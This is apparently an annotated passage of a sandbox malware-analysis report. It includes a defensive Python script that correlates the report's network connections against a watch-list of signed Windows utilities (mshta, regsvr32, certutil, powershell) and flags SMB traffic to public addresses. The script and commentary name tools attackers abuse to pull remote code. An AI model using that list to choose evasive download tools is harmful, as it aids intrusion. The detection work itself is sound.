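The Connections table above is a better pivot than its reputation column: one CDN host (151.101.0.133, raw.githubusercontent.com) is reached by mshta.exe, powershell.exe, regsvr32.exe, WMIC.exe and cscript.exe, and PID 4 (System) opens SMB to a public address, which is the kernel redirector serving the esentutl copy from \\live.sysinternals.com shown under Process information. The report labels the GitHub hosts "malicious" here and "shared" in the DNS table, so reputation alone is not a stable signal. The block below is an added example, not ANY.RUN's code, that correlates on process identity instead: a watch-list of signed utilities that rarely need their own network sessions and a small benign-destination set (both assumptions made for the example), plus an SMB-to-public-address check, run over records transcribed from this report's Connections and HTTP tables.

```python
"""Correlate the report's Connections table with a watch-list of signed
Windows utilities that rarely need outbound network access.

Added example, not ANY.RUN's code. CONNECTIONS is transcribed from the
Connections and HTTP tables of this report; NETWORK_WATCHLIST and
BENIGN_DOMAINS are assumptions made for the example.
"""
import ipaddress
from collections import defaultdict

# Microsoft-signed binaries that are common on a host but seldom need their
# own TCP sessions; an outbound connection from one of them is a strong pivot.
NETWORK_WATCHLIST = {
    "mshta.exe", "regsvr32.exe", "wmic.exe", "cscript.exe", "wscript.exe",
    "msiexec.exe", "certutil.exe", "bitsadmin.exe", "rundll32.exe",
    "powershell.exe", "hh.exe", "esentutl.exe", "installutil.exe",
}

# OS housekeeping endpoints seen in this run (CRL/OCSP fetches, NCSI probe).
BENIGN_DOMAINS = {"ocsp.digicert.com", "www.microsoft.com", "dns.msftncsi.com"}

# Transcribed from the report: (pid, process, "ip:port", domain).
CONNECTIONS = [
    (3996, "mshta.exe", "151.101.0.133:443", "raw.githubusercontent.com"),
    (3996, "mshta.exe", "93.184.220.29:80", "ocsp.digicert.com"),
    (3196, "powershell.exe", "151.101.0.133:443", "raw.githubusercontent.com"),
    (3980, "regsvr32.exe", "151.101.0.133:443", "raw.githubusercontent.com"),
    (3772, "WMIC.exe", "151.101.0.133:443", "raw.githubusercontent.com"),
    (1604, "cscript.exe", "151.101.0.133:443", "raw.githubusercontent.com"),
    (2600, "msiexec.exe", "140.82.118.3:443", "github.com"),
    (4, "System", "51.11.30.100:445", "live.sysinternals.com"),
    (3360, "msiexec.exe", "140.82.118.3:443", "github.com"),
    (1052, "svchost.exe", "2.18.233.62:80", "www.microsoft.com"),
]


def split_endpoint(endpoint):
    """'151.101.0.133:443' -> ('151.101.0.133', 443)."""
    ip, _, port = endpoint.rpartition(":")
    return ip, int(port)


def suspicious_connections(conns):
    """Findings for watch-listed processes reaching non-benign hosts, and for
    SMB (445) sessions to public addresses (a remote-share file fetch)."""
    findings = []
    for pid, proc, endpoint, domain in conns:
        ip, port = split_endpoint(endpoint)
        proc = proc.lower()
        if proc in NETWORK_WATCHLIST and domain not in BENIGN_DOMAINS:
            findings.append({"pid": pid, "process": proc, "domain": domain,
                             "port": port, "reason": "lolbin-egress"})
        if port == 445 and not ipaddress.ip_address(ip).is_private:
            findings.append({"pid": pid, "process": proc, "domain": domain,
                             "port": port, "reason": "smb-to-internet"})
    return findings


def pivot_hosts(conns, min_processes=3):
    """Hosts contacted by at least min_processes distinct watch-listed binaries."""
    procs_by_host = defaultdict(set)
    for _, proc, _, domain in conns:
        if proc.lower() in NETWORK_WATCHLIST:
            procs_by_host[domain].add(proc.lower())
    return {host: len(p) for host, p in procs_by_host.items()
            if len(p) >= min_processes}


if __name__ == "__main__":
    for f in suspicious_connections(CONNECTIONS):
        print("{reason:16} pid={pid:<5} {process:16} -> {domain}:{port}".format(**f))
    print("pivot hosts:", pivot_hosts(CONNECTIONS))
```

The SMB check uses the System process (PID 4) deliberately: user-mode tools that pull a file from a UNC path never own the socket, so a detection keyed on the calling binary misses it, while port 445 to a non-private address is rare enough on a workstation to alert on directly. `pivot_hosts` makes the second point of the table explicit: five different watch-listed binaries reaching the same host within one run is a stronger indicator than any one of those connections alone.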
DNS requests

raw.githubusercontent.com: 151.101.0.133, 151.101.64.133, 151.101.128.133, 151.101.192.133 (shared)
ocsp.digicert.com: 93.184.220.29 (whitelisted)
www.microsoft.com: 2.18.233.62 (whitelisted)
github.com: 140.82.118.3 (malicious)
live.sysinternals.com: 51.11.30.100 (suspicious)
dns.msftncsi.com: 131.107.255.255 (shared)

Threats

Two alerts, neither attributed to a PID/process in the report:

Class: Potentially Bad Traffic  Message: ET INFO TLS Handshake Failure
Class: Potentially Bad Traffic  Message: ET INFO TLS Handshake Failure
No debug info